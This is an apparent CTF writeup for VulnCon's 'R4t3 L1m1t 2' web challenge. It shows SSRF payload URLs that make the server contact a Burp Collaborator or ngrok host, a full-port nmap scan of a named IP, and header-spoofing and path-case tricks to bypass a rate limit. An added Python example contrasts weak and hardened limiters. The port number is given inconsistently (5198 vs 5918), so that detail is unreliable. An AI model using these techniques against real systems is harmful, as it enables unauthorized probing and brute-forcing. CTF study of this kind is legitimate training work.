R4t3 L1m1t 2 Challenge Writeup — CTF
--
Hello folks, I am back again with another writeup on my channel, this one based on SSRF, network scanning and rate-limit bypassing.
Challenge Name — R4t3 L1m1t 2
Category — Web
Organizer — VulnCon
Author — th3pr0xyb0y
Description — ‘John is developing a website to show images to customers. Some customers tried to mess with his website and got the IP address of the server on which the admin panel is hosted, but they were stuck by the rate limit implemented by John. Now your task is to find the hidden admin dashboard and bypass the rate limit to get your flag.’
Link — http://ratelimit2.noobarmy.org
Solution: the description tells us there is something related to getting an IP address and then bypassing a rate limit, so let's take a look at the challenge page.
Images and more images. If you refresh the page again and again you will see random images, except for one image that stays static (in my case it was mine, but it can be any one image). A player can also spot it by viewing the source code: one of the images is fetched from /images/image.jpg. Let me add the image snippet for a clearer view.
Looking at the alt tag of that image, we get the base64 encoded string given below: d2VlYXR0aGVjb29raWVzaW5tb3JuaW5nZGlkeW91Pw==
Decoding the base64 with https://www.base64decode.org gives “weeatthecookiesinmorningdidyou?”
Interesting string; it is telling us something about cookies, so let's check out the cookies.
There are many cookies, but if we dig deeper and look at the values, all of them resemble an endpoint of the form /show?xxx=an_image_url, so this looks like a vulnerable endpoint. A player needs to extract all the endpoints from the cookies (or from the photograph JS file in the source code) and brute-force them to find the correct one, then replace an_image_url with a Burp Collaborator URL or the URL of their own server. The server fetches that URL itself, which is an external SSRF, and the request arrives from the internal IP address that sits behind Cloudflare. The final working payload is:
“http://ratelimit2.noobarmy.org/show?wwe=burpcollaburlhere/anything.jpg”
Or
“http://ratelimit2.noobarmy.org/show?wwe=ngrokiphere/anything.jpg”
Bonus point — the decoded message starts with “wee” and also mentions cookies; this is a way of guessing the parameter without brute-forcing.
See the image below for the successful exploitation of the external SSRF.
Ip Found : 45.63.85.56
Once we have the internal IP address, what can we do with it? You guessed it right: we run a full nmap scan over it.
Command: nmap -p 1-65535 45.63.85.56
Port Found : 5198
Shout-out to my bug hunting course (70+ hours) — do check out E-CyberXplore https://edu.cyberxplore.com [not related to this CTF, just a shout-out]
Oh wow, we found a new port, 5198. Let's look at the content of this port and visit http://45.63.85.56:5918
On http://45.63.85.56:5918 we get the same old rate-limit page with some text changed on the frontend, so how do we proceed? The author planned this page as a dead end for everyone who hasn't solved the previous r4t3l1m1t challenge (writeup: Click Here). It is exactly the same as the previous one, except that the author added that an X-Something header is necessary this time to get the flag, and players can't even use IP rotation; they need to know the bypass.
So I hope you have read the r4t3l1m1t writeup (Click Here) and come back here. You now understand that rate limits can be bypassed by changing the endpoint case (mixed upper and lower case, or upper case only instead of lower case).
If we do what we did last time on one of the OTPs, we get a weird response:
{"msg":"Y00000u 4r3 S00000 Cl00000000$3"}
After this the author wants the player to try the regular bypasses, the X-Something headers, for example:
X-Forwarded-For:
X-Host:
X-Remote-IP:
etc.
As soon as the player sends the request with any of the X-Something headers, brute-forces, and checks the content instead of the Content-Length like in the last challenge, he will get the flag. See:
Bonus tip 2 — the response above saying you are so close signifies that the OTP we entered is correct but something is still missing, so there is no need to brute-force: we can directly add the header and get the flag.
Bonus tip 3 — if you are a keen observer, the port on which the service is running becomes the OTP when reversed: 5918 is the port and 8195 is the OTP.
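Both bypasses used above (changing the endpoint's case and adding an X-Forwarded-For style header) work against a limiter that keys its counter on the raw request path and trusts client-supplied headers for the client's identity. The Python below is an added example, not code from the challenge or its author: a minimal fixed-window limiter with the weak key function beside a hardened one, replayed over constructed traffic; the /verify endpoint, the addresses and the limit of 5 guesses are assumptions.

```python
from collections import defaultdict

WINDOW_SECONDS = 60
MAX_ATTEMPTS = 5          # OTP guesses allowed per key per window (assumed)

class RateLimiter:
    """Fixed-window counter; the key function decides what counts as one client."""
    def __init__(self, key_func):
        self.key_func = key_func
        self.hits = defaultdict(list)      # key -> timestamps of allowed hits

    def allow(self, request, now):
        key = self.key_func(request)
        recent = [t for t in self.hits[key] if now - t < WINDOW_SECONDS]
        if len(recent) >= MAX_ATTEMPTS:
            self.hits[key] = recent
            return False                   # over the limit for this key
        recent.append(now)
        self.hits[key] = recent
        return True

def weak_key(request):
    # Trusts a client-controlled header for identity and keys on the raw path,
    # so /VERIFY or a spoofed X-Forwarded-For value gets a fresh counter.
    client = request["headers"].get("X-Forwarded-For", request["peer"])
    return (client, request["path"])

def hardened_key(request):
    # Uses the socket peer address (set by the server, not the client) and
    # lowercases the path so that case variants share one counter.
    return (request["peer"], request["path"].lower())

def count_allowed(key_func, requests):
    # Replay the requests one second apart and return how many got through.
    limiter = RateLimiter(key_func)
    return sum(limiter.allow(req, now=i) for i, req in enumerate(requests))

# Constructed traffic (not from the challenge): one peer sends six guesses to a
# hypothetical /verify endpoint, then tries the two variants from the writeup.
PEER = "198.51.100.7"                      # placeholder address (RFC 5737)
def make(path, headers=None):
    return {"peer": PEER, "path": path, "headers": headers or {}}
TRAFFIC = [make("/verify") for _ in range(6)] + [
    make("/VERIFY"), make("/Verify"),                        # casing variants
    make("/verify", {"X-Forwarded-For": "203.0.113.9"}),     # spoofed header
]

if __name__ == "__main__":
    print("weak limiter allowed:", count_allowed(weak_key, TRAFFIC))          # 8
    print("hardened limiter allowed:", count_allowed(hardened_key, TRAFFIC))  # 5
```

The hardened key relies on the socket peer being the real client; behind a reverse proxy such as Cloudflare the server should take the client address only from the header the proxy itself sets, and only when the peer is that proxy.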
See it in action below:
Flag: "vulncon{$$rf_t0_nm4p_t0_r4t3_l1m1t_w4s_$0_c00l}"
That's all from my side! Thanks for taking the time to read this; some claps would be really appreciated.
Follow me on social media :
Twitter @th3pr0xyb0y
Facebook @vanshdevgan0221
Instagram @vanshdevgan
More about me on https://vanshdevgan.com
Have a Great Day :)